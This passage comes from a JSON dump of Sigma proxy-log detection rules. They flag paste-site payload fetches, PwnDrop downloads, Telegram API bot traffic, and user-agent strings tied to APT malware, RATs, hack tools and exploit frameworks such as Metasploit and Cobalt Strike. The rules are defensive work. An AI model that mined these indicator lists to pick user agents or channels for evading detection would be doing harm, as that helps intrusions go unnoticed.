    "content": "title: PUA - Advanced IP/Port Scanner Update Check\nid: 1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d\nstatus: test\ndescription: Detect the update check performed by Advanced IP/Port Scanner utilities.\nreferences:\n    - https://www.advanced-ip-scanner.com/\n    - https://www.advanced-port-scanner.com/\nauthor: Axel Olsson\ndate: 2022-08-14\nmodified: 2024-02-15\ntags:\n    - attack.discovery\n    - attack.reconnaissance\n    - attack.t1590\nlogsource:\n    category: proxy\ndetection:\n    selection:\n      # Example request: http://www.advanced-port-scanner.com/checkupdate.php?lng=en&ver=2-5-3680&beta=n&type=upd&rmode=p&product=aps\n      # Example request2: http://www.advanced-ip-scanner.com/checkupdate.php?lng=en&ver=2-5-3499&beta=n&type=upd&rmode=p&product=aips\n        c-uri|contains: '/checkupdate.php'\n        c-uri-query|contains|all:\n            - 'lng='\n            - 'ver='\n            - 'beta='\n            - 'type='\n            - 'rmode='\n            - 'product='\n    condition: selection\nfalsepositives:\n    - Expected if you legitimately use the Advanced IP or Port Scanner utilities in your environement.\nlevel: medium\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_pwndrop.yml",
    "content": "title: PwnDrp Access\nid: 2b1ee7e4-89b6-4739-b7bb-b811b6607e5e\nstatus: test\ndescription: Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity\nreferences:\n    - https://breakdev.org/pwndrop/\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-04-15\nmodified: 2021-11-27\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - attack.t1102.001\n    - attack.t1102.003\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri|contains: '/pwndrop/'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_raw_paste_service_access.yml",
    "content": "title: Raw Paste Service Access\nid: 5468045b-4fcc-4d1a-973c-c9c9578edacb\nstatus: test\ndescription: Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form\nreferences:\n    - https://www.virustotal.com/gui/domain/paste.ee/relations\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-12-05\nmodified: 2023-01-19\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - attack.t1102.001\n    - attack.t1102.003\n    - attack.defense-evasion\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri|contains:\n            - '.paste.ee/r/'\n            - '.pastebin.com/raw/'\n            - '.hastebin.com/raw/'\n            - '.ghostbin.co/paste/*/raw/'\n            - 'pastetext.net/'\n            - 'pastebin.pl/'\n            - 'paste.ee/'\n    condition: selection\nfalsepositives:\n    - User activity (e.g. developer that shared and copied code snippets and used the raw link instead of just copy & paste)\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_susp_flash_download_loc.yml",
    "content": "title: Flash Player Update from Suspicious Location\nid: 4922a5dd-6743-4fc2-8e81-144374280997\nstatus: test\ndescription: Detects a flashplayer update from an unofficial location\nreferences:\n    - https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-10-25\nmodified: 2022-08-08\ntags:\n    - attack.initial-access\n    - attack.t1189\n    - attack.execution\n    - attack.t1204.002\n    - attack.defense-evasion\n    - attack.t1036.005\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        - c-uri|contains: '/flash_install.php'\n        - c-uri|endswith: '/install_flash_player.exe'\n    filter:\n        cs-host|endswith: '.adobe.com'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown flash download locations\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_susp_ipfs_cred_harvest.yml",
    "content": "title: Suspicious Network Communication With IPFS\nid: eb6c2004-1cef-427f-8885-9042974e5eb6\nstatus: test\ndescription: Detects connections to interplanetary file system (IPFS) containing a user's email address which mirrors behaviours observed in recent phishing campaigns leveraging IPFS to host credential harvesting webpages.\nreferences:\n    - https://blog.talosintelligence.com/ipfs-abuse/\n    - https://github.com/Cisco-Talos/IOCs/tree/80caca039988252fbb3f27a2e89c2f2917f582e0/2022/11\n    - https://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638\nauthor: Gavin Knapp\ndate: 2023-03-16\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.t1056\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-uri|re: '(?i)(ipfs\\.io/|ipfs\\.io\\s).+\\..+@.+\\.[a-z]+'\n    condition: selection\nfalsepositives:\n    - Legitimate use of IPFS being used in the organisation. However the cs-uri regex looking for a user email will likely negate this.\nlevel: low\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_telegram_api.yml",
    "content": "title: Telegram API Access\nid: b494b165-6634-483d-8c47-2026a6c52372\nstatus: test\ndescription: Detects suspicious requests to Telegram API without the usual Telegram User-Agent\nreferences:\n    - https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/\n    - https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/\n    - https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-06-05\nmodified: 2023-05-18\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1071.001\n    - attack.t1102.002\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-host: 'api.telegram.org' # Often used by Bots\n    filter:\n        c-useragent|contains:\n            # Used https://core.telegram.org/bots/samples for this list\n            - 'Telegram'\n            - 'Bot'\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate use of Telegram bots in the company\nlevel: medium\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_ua_apt.yml",
    "content": "title: APT User Agent\nid: 6ec820f2-e963-4801-9127-d8b2dce4d31b\nstatus: test\ndescription: Detects suspicious user agent strings used in APT malware in proxy logs\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems), Markus Neis\ndate: 2019-11-12\nmodified: 2024-02-15\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent:\n         # APT Related\n            - 'SJZJ (compatible; MSIE 6.0; Win32)' # APT Backspace\n            - 'Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0' # APT GrizzlySteppe - ChopStick - US CERT https://www.cisa.gov/news-events/alerts/2017/02/10/enhanced-analysis-grizzly-steppe\n            - 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC' # Comment Crew Miniasp\n            - 'Mozilla/4.0 (compatible; MSIE 7.4; Win32;32-bit)' # Comment Crew Miniasp\n            - 'webclient' # Naikon APT\n            - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200' # Naikon APT\n            - 'Mozilla/4.0 (compatible; MSI 6.0;' # SnowGlobe Babar - yes, it is cut\n            - 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0' # Sofacy - Xtunnel\n            - 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:20.0) Gecko/20100101 Firefox/' # Sofacy - Xtunnel\n            - 'Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/2' # Sofacy - Xtunnel\n            - 'Mozilla/4.0' # Derusbi backdoor ELF https://github.com/fideliscyber/indicators/tree/master/FTA-1021\n            - 'Netscape' # Unit78020 Malware\n            - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7' # Unit78020 Malware\n            - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Firefox/3.6.13 GTB7.1' # Winnti related\n            - 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)' # Winnti related\n            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NETCLR 2.0.50727)' # APT17\n            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)' # Bronze Butler - Daserf\n            - 'Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)' # Bronze Butler - Daserf\n            - 'Mozilla/4.0 (compatible; MSIE 8.0; Win32)' # TSCookie https://app.any.run/tasks/0996b314-5133-491b-8d23-d431ffdec597\n            - 'Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1' # Delphi downloader https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/\n            - 'Mozilla/6.1 (compatible; MSIE 9.0; Windows NT 5.3; Trident/5.0)' # VPNFilter https://blog.talosintelligence.com/2018/05/VPNFilter.html\n            - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)' # Sofacy User-Agent https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/\n            - 'Mozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko' # Sofacy User-Agent https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/\n            - 'Mozilla v5.1 *' # Sofacy Zebrocy samples\n            - 'MSIE 8.0' # Sofacy Azzy Backdoor  from https://www.hybrid-analysis.com/sample/a80e29c0757bee05338fd5c22a542d852ad86c477068e3eb4aacc1c3e59e2eef?environmentId=100\n            - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)' # https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html\n            - 'Mozilla/4.0 (compatible; RMS)' # Attacks on industrial enterprises using RMS and TeamViewer - https://securelist.com/attacks-on-industrial-enterprises-using-rms-and-teamviewer/87104/\n            - 'Mozilla/4.0 (compatible; MSIE 6.0; DynGate)' # Attacks on industrial enterprises using RMS and TeamViewer - https://securelist.com/attacks-on-industrial-enterprises-using-rms-and-teamviewer/87104/\n            - 'O/9.27 (W; U; Z)' # Cmstar https://www.virustotal.com/#/file/e4328011bb2b04abc856ccd04404c9f95d67167f6c291d343e8ffa8aa2aa2099/details\n            - 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0*' # KerrDown UA\n            - 'Mozilla/5.0 (Windows NT 9; *' # Suspicious 'Windows NT 9' user agent - used by APT33 malware in 2018\n            - 'hots scot' # Unknown iOS zero-day implant https://twitter.com/craiu/status/1176437994288484352?s=20\n            - 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT)' # https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/\n            - 'Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/28.0.1500.95 Safari/537.36' # Hidden Cobra malware\n            - 'Mozilla/5.0 (Windows NT 6.2; Win32; rv:47.0)' # Strong Pity loader https://twitter.com/VK_Intel/status/1264185981118406657\n            - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;' # Mustang Panda https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/\n            - 'Mozilla/5.0 (X11; Linux i686; rv:22.0) Firefox/22.0' # BackdoorDiplomacy https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/\n            - 'Mozilla/5.0 Chrome/72.0.3626.109 Safari/537.36' # SideWalk malware used by Sparkling Goblin\n            - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:FTS_06) Gecko/22.36.35.06 Firefox/2.0' # LitePower stager used by WRITE https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044/\n            - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/100.0.1185.39' # https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/\n            - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)' # https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/\n            - 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; Tablet PC 2.0)' # PlugX backdoor https://unit42.paloaltonetworks.com/thor-plugx-variant/\n            - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246001'  # RedCurl Downloader APT https://www.facct.ru/blog/redcurl-2024\n    condition: selection\nfalsepositives:\n    - Old browsers\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_ua_base64_encoded.yml",
    "content": "title: Suspicious Base64 Encoded User-Agent\nid: d443095b-a221-4957-a2c4-cd1756c9b747\nrelated:\n    - id: 894a8613-cf12-48b3-8e57-9085f54aa0c3\n      type: derived\nstatus: test\ndescription: Detects suspicious encoded User-Agent strings, as seen used by some malware.\nreferences:\n    - https://deviceatlas.com/blog/list-of-user-agent-strings#desktop\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-04\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent|startswith:\n            - 'Q2hyb21l' # Chrome Encoded with offset to not include padding\n            - 'QXBwbGVXZWJLaX' # AppleWebKit Encoded with offset to not include padding\n            - 'RGFsdmlr' # Dalvik Encoded with offset to not include padding\n            - 'TW96aWxsY'  # Mozilla Encoded with offset to not include padding (as used by YamaBot)\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_ua_bitsadmin_susp_ip.yml",
    "content": "title: Bitsadmin to Uncommon IP Server Address\nid: 8ccd35a2-1c7c-468b-b568-ac6cdf80eec3\nstatus: test\ndescription: Detects Bitsadmin connections to IP addresses instead of FQDN names\nreferences:\n    - https://isc.sans.edu/diary/Microsoft+BITS+Used+to+Download+Payloads/21027\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-06-10\nmodified: 2022-08-24\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\n    - attack.s0190\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent|startswith: 'Microsoft BITS/'\n        cs-host|endswith:\n            - '1'\n            - '2'\n            - '3'\n            - '4'\n            - '5'\n            - '6'\n            - '7'\n            - '8'\n            - '9'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml",
    "content": "title: Bitsadmin to Uncommon TLD\nid: 9eb68894-7476-4cd6-8752-23b51f5883a7\nstatus: test\ndescription: Detects Bitsadmin connections to domains with uncommon TLDs\nreferences:\n    - https://twitter.com/jhencinski/status/1102695118455349248\n    - https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/\nauthor: Florian Roth (Nextron Systems), Tim Shelton\ndate: 2019-03-07\nmodified: 2023-05-17\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\n    - attack.s0190\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent|startswith: 'Microsoft BITS/'\n    falsepositives:\n        cs-host|endswith:\n            - '.com'\n            - '.net'\n            - '.org'\n            - '.scdn.co' # spotify streaming\n            - '.sfx.ms' # Microsoft domain, example request: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-08-15-21-xx-xx/PreSignInSettingsConfig.json\n    condition: selection and not falsepositives\nfalsepositives:\n    - Rare programs that use Bitsadmin and update from regional TLDs e.g. .uk or .ca\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_ua_cryptominer.yml",
    "content": "title: Crypto Miner User Agent\nid: fa935401-513b-467b-81f4-f9e77aa0dd78\nstatus: test\ndescription: Detects suspicious user agent strings used by crypto miners in proxy logs\nreferences:\n    - https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65\n    - https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-10-21\nmodified: 2021-11-27\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent|startswith:\n        # XMRig\n            - 'XMRig '\n        # CCMiner\n            - 'ccminer'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_ua_empty.yml",
    "content": "title: HTTP Request With Empty User Agent\nid: 21e44d78-95e7-421b-a464-ffd8395659c4\nstatus: test\ndescription: |\n    Detects a potentially suspicious empty user agent strings in proxy log.\n    Could potentially indicate an uncommon request method.\nreferences:\n    - https://twitter.com/Carlos_Perez/status/883455096645931008\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-07-08\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n      # Empty string - as used by Powershell's (New-Object Net.WebClient).DownloadString\n        c-useragent: ''\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_ua_frameworks.yml",
    "content": "title: Exploit Framework User Agent\nid: fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f\nstatus: test\ndescription: Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs\nreferences:\n    - https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-07-08\nmodified: 2025-01-18\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent:\n        # Cobalt Strike https://www.cobaltstrike.com/help-malleable-c2\n            - 'Internet Explorer *'\n            - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)' # https://bluescreenofjeff.com/2016-06-28-cobalt-strike-http-c2-redirectors-with-apache-mod_rewrite/\n\n        # Metasploit Framework - Analysis by Didier Stevens https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/\n            - 'Mozilla/4.0 (compatible; Metasploit RSPEC)'\n            - 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'\n            - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' # old browser, rare, base-lining needed\n            - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' # old browser, rare, base-lining needed\n            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)' # old browser, rare, base-lining needed\n            - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N'\n            - 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' # only use in proxy logs - not for detection in web server logs\n            - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/525.13'\n            - 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MAAU)' # Payloads\n\n        # Metasploit Update by Florian Roth 08.07.2017\n            - 'Mozilla/5.0'\n            - 'Mozilla/4.0 (compatible; SPIPE/1.0'\n        # - 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'  # too many false positives expected\n        # - 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'  # too many false positives expected\n            - 'Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/35.0'\n            - 'Sametime Community Agent' # Unknown if prone to false positives - https://github.com/rapid7/metasploit-framework/blob/97095ab3113de2f046e64a64c461a1f888554401/modules/exploits/windows/http/steamcast_useragent.rb\n            - 'X-FORWARDED-FOR'\n            - 'DotDotPwn v2.1'\n            - 'SIPDROID'\n            - 'Mozilla/5.0 (Windows NT 10.0; Win32; x32; rv:60.0)' # CobaltStrike https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/\n\n        # Empire\n            - 'Mozilla/6.0 (X11; Linux x86_64; rv:24.0) Gecko/20140205     Firefox/27.0 Iceweasel/25.3.0'\n\n        # Exploits\n            - '*wordpress hash grabber*'\n            - '*exploit*'\n\n        # Havoc\n            - 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36'  # https://github.com/HavocFramework/Havoc/issues/519\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_ua_hacktool.yml",
    "content": "title: Hack Tool User Agent\nid: c42a3073-30fb-48ae-8c99-c23ada84b103\nstatus: test\ndescription: Detects suspicious user agent strings user by hack tools in proxy logs\nreferences:\n    - https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb\n    - http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-07-08\nmodified: 2022-07-07\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - attack.credential-access\n    - attack.t1110\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent|contains:\n            # Vulnerability scanner and brute force tools\n            - '(hydra)'\n            - ' arachni/'\n            - ' BFAC '\n            - ' brutus '\n            - ' cgichk '\n            - 'core-project/1.0'\n            - ' crimscanner/'\n            - 'datacha0s'\n            - 'dirbuster'\n            - 'domino hunter'\n            - 'dotdotpwn'\n            - 'FHScan Core'\n            - 'floodgate'\n            - 'get-minimal'\n            - 'gootkit auto-rooter scanner'\n            - 'grendel-scan'\n            - ' inspath '\n            - 'internet ninja'\n            - 'jaascois'\n            - ' zmeu '\n            - 'masscan'\n            - ' metis '\n            - 'morfeus fucking scanner'\n            - 'n-stealth'\n            - 'nsauditor'\n            - 'pmafind'\n            - 'security scan'\n            - 'springenwerk'\n            - 'teh forest lobster'\n            - 'toata dragostea'\n            - ' vega/'\n            - 'voideye'\n            - 'webshag'\n            - 'webvulnscan'\n            - ' whcc/'\n            # SQL Injection\n            - ' Havij'\n            - 'absinthe'\n            - 'bsqlbf'\n            - 'mysqloit'\n            - 'pangolin'\n            - 'sql power injector'\n            - 'sqlmap'\n            - 'sqlninja'\n            - 'uil2pn'\n            # Hack tool\n            - 'ruler'  # https://www.crowdstrike.com/blog/using-outlook-forms-lateral-movement-persistence/\n            - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)'  # SQLi Dumper\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_ua_malware.yml",
    "content": "title: Malware User Agent\nid: 5c84856b-55a5-45f1-826f-13f37250cf4e\nstatus: test\ndescription: Detects suspicious user agent strings used by malware in proxy logs\nreferences:\n    - http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules\n    - http://www.botopedia.org/search?searchword=scan&searchphrase=all\n    - https://networkraptor.blogspot.com/2015/01/user-agent-strings.html\n    - https://perishablepress.com/blacklist/ua-2013.txt\n    - https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents\n    - https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q\n    - https://pbs.twimg.com/media/FtYbfsDXoAQ1Y8M?format=jpg&name=large\n    - https://twitter.com/crep1x/status/1635034100213112833\nauthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2017-07-08\nmodified: 2024-04-14\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent:\n            # RATs\n            - 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Chrome /53.0' # DragonOK\n            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)' # Used by PlugX - base-lining recommended - https://community.rsa.com/thread/185439\n            - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)' # Used by PlugX - base-lining recommended - https://community.rsa.com/thread/185439\n            - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR  1.1.4322)' # Used by PlugX - old - https://unit42.paloaltonetworks.com/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/\n            - 'HttpBrowser/1.0' # HTTPBrowser RAT\n            - '*<|>*' # Houdini / Iniduoh / njRAT\n            - 'nsis_inetc (mozilla)' # ZeroAccess\n            - 'Wget/1.9+cvs-stable (Red Hat modified)' # Dyre / Upatre\n            # Ghost419 https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/\n            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)'\n            # Malware\n            - '*zeroup*' # W32/Renos.Downloader\n            - 'Mozilla/5.0 (Windows NT 5.1 ; v.*' # Kazy\n            - '* adlib/*'\n            - '* tiny' # Trojan Downloader\n            - '* BGroom *' # Trojan Downloader\n            - '* changhuatong'\n            - '* CholTBAgent'\n            - 'Mozilla/5.0 WinInet'\n            - 'RookIE/1.0'\n            - 'M' # HkMain\n            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)' # Egamipload - old UA - probable prone to false positives\n            - 'Mozilla/4.0 (compatible;MSIE 7.0;Windows NT 6.0)' # Yakes\n            - 'backdoorbot'\n            - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)' # Sality\n            - 'Opera/8.81 (Windows NT 6.0; U; en)' # Sality\n            - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30729)' # Sality\n            - 'Opera' # Trojan Keragany\n            - 'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)' # Fareit\n            - 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)' # Webshell's back connect\n            - 'MSIE' # Toby web shell\n            - '*(Charon; Inferno)' # Loki Bot\n            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)' # Fareit / Pony\n            - 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' # https://www.virustotal.com/gui/file/8abbef8e58f012d45a7cb46c3c2729dcd33cf53e721ff8c59e238862aa0a9e0e/detection\n            - 'Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1)' # MacControl malware https://www.virustotal.com/gui/file/d60f61f1f03a5011a0240694e110c6d370bf68a92753093186c6d14e26a15428/detection https://www.symantec.com/connect/blogs/osxmacontrol-back-it-again\n            - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' # used by Zebrocy malware https://app.any.run/tasks/7d7fa4a0-6970-4428-828b-29572abf9ceb/\n            # Ursnif\n            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)'\n            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)'\n            # Emotet\n            - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; InfoPath.3)' # https://twitter.com/webbthewombat/status/1225827092132179968\n            # Lockbit (https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q)\n            - 'Mozilla/5.0 (Windows NT 6.1)'\n            - 'AppleWebkit/587.38 (KHTML, like Gecko)'\n            - 'Chrome/91.0.4472.77'\n            - 'Safari/537.36'\n            - 'Edge/91.0.864.37'\n            - 'Firefox/89.0'\n            - 'Gecko/20100101'\n            # Others\n            - '* pxyscand*'\n            - '* asd'\n            - '* mdms'\n            - 'sample'\n            - 'nocase'\n            - 'Moxilla'\n            - 'Win32 *'\n            - '*Microsoft Internet Explorer*'\n            - 'agent *'\n            - 'AutoIt' # Suspicious - base-lining recommended\n            - 'IczelionDownLoad'\n            - 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; Tablet PC 2.0)' # 